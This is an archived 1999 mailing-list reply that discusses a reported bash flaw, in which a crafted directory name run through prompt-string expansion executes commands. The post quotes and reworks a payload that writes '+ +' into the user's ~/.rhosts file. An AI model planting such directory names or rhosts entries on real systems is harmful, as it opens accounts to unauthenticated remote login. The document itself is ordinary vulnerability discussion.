On Tue, Apr 20, 1999 at 09:25:47PM -0400, Shadow wrote: > > If a user creates a directory with a command like > > mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " It seems to me that this is related to the prompt string parsing. If yes, then bash is not vulnerable unless configured to display the current directory (correct me if the root of the problem is different). Some additional notes: - I was unable to reproduce this on my system, even when bash is configured to display the current path in the prompt. (bash 2.02.1(1)) - The original example seemed to have too much whitespace. I used: mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\`" - PS1 was set to \h:\w\$ HTH -- -----==- | ----==-- _ | ---==---(_)__ __ ____ __ Marc Lehmann +-- --==---/ / _ \/ // /\ \/ / pcgat_private |e| -=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE --+ The choice of a GNU generation | |
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:43:30 PDT